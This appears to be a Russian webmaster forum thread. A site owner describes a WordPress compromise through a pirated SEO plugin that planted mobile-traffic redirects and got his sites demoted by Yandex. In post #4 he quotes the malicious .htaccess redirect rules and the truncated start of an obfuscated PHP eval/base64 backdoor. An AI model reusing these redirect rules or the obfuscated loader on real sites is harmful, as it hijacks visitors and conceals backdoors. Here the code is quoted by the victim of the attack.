Wordpress дырка от бублика. Как объяснить яндексу?

123 4
Jack SparroW
На сайте с 06.12.2012
Offline
208
3880

На хостинге хранится десяток сайтов, один из них использует cms Wordpress. Как оказалось Wordpress это просто рай для взломщиков. Кто-то нашел дырку в безопасности и залил шелл, который внес изменения во все редиректы на всех сайтах хостинга. В ближайший апдейт яндекс выкинул все сайты из топов - ровно на -20 позиций.

Почуяв неладное я пишу в яндекс. Получаю ответ:

Недавно в наши алгоритмы были внесены значительные изменения, и теперь с ограничениям могут ранжироваться сайты, обманывающие пользователей мобильного интернета. Иногда такие пользователи при переходе на сайты из результатов поиска не могут получить найденную для них информацию. Это происходит из-за того, что некоторые сайты не показывают таким пользователям тот контент, который был проиндексирован поисковым роботом. А часто просто перенаправляют посетителей на страницы с подпиской на платные контент-услуги. Подробнее об этом Вы можете прочитать на страницах нашего блога: http://webmaster.ya.ru/replies.xml?item_no=20239 .

Если Вы будете развивать Ваш сайт для пользователей, размещать уникальную, полезную информацию и следовать нашим рекомендациям, то со временем ограничения могут быть сняты автоматически, и позиции сайта в результатах поиска улучшатся.

Шелл был удален через 2 дня, потом писал в яндекс.

Как доказать что мобильный редирект был использован без моего ведома?

Капитан Джек Воробей!
M
На сайте с 25.07.2013
Offline
60
#1

Так и пиши в тех поддержку взломали сайт. В общем правду пиши!

MrDesigner
На сайте с 31.01.2008
Offline
210
#2
jacksparrow:
Как оказалось Wordpress это просто рай для взломщиков.

Зачем вы троллите?

Расскажите уж нам - через какую дырку Вордпресса ломанули движок?

Алексей
На сайте с 23.02.2009
Offline
584
#3
jacksparrow:

Как доказать что мобильный редирект был использован без моего ведома?

Метрику закрыли в хосте? Если нет, то Яндекс видит как вы ходите со своего браузера по сайту, который делает выплаты за мобильный редирект :o

Jack SparroW
На сайте с 06.12.2012
Offline
208
#4
MrDesigner:
Зачем вы троллите?

Расскажите уж нам - через какую дырку Вордпресса ломанули движок?

Вот этого я и боюсь, что никто не поверит, тем более в яндексе... (как вы например).

Через seo плагин был залит шеел. Хостинг сразу же ругался и выдал вирус {CAV}Php.Trojan.StopPost, я его удалить смог только через 2 дня, т.к. область заражения была огромная (десяток сайтов).

htaccess прописывалось следующее:

RewriteCond %{REMOTE_ADDR} ^213\.87\.(128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143)\. [OR]

RewriteRule .* http://warp-master.ru/opera/load/ [L,R]

и далее....

В файлы движков добавлялся php код, и обнаружил неизвестный файл в корне сайта:

<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54)."\x34_".chr(100)."".chr(101)."".chr(99)."o\x64e".chr(40)."";$O9654 = "".chr(41)."\x29)".chr(59)."";$jlvpdR6408 = $Gcwa9593."'TZxXr.

A
На сайте с 20.08.2010
Offline
775
#5
jacksparrow:
Вот этого я и боюсь, что никто не поверит, тем более в яндексе... (как вы например).

Через seo плагин был залит шеел.

Поверим. Только причем тут вп, если шелл был залит через плагин?

MrDesigner
На сайте с 31.01.2008
Offline
210
#6

ТС, имя плагина в студию.

Jack SparroW
На сайте с 06.12.2012
Offline
208
#7
awasome:
Поверим. Только причем тут вп, если шелл был залит через плагин?

Притом что он давал модифицировать системные файлы. ДА и вообще теперь он мне не нравится 😡

Уж больно легко заражаются wordpress сайты с этими плагинами. Тем, кто, как я не профессионально занимается вебмастерингом, легко попастся на удочку мошенников, распространяющих вирусы под видом плагинов для wordpress.

Плагин

All in One SEO Pack, каюсь, скачал из инета....

A
На сайте с 20.08.2010
Offline
775
#8
jacksparrow:

Плагин
All in One SEO Pack, каюсь, скачал из инета....

Во-первых, надо обновляться, во-вторых, где гарантии, что вредоносный код уже не был внедрен в плагин, скачанный на просторах?

MrDesigner
На сайте с 31.01.2008
Offline
210
#9
jacksparrow:
Плагин All in One SEO Pack, каюсь, скачал из инета....

Золотые слова: скачан из интернета!

Точнее пишите, откуда? С официальной страницы?

M
На сайте с 18.10.2012
Offline
21
#10

Напиши им все то, что написал сюда.

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий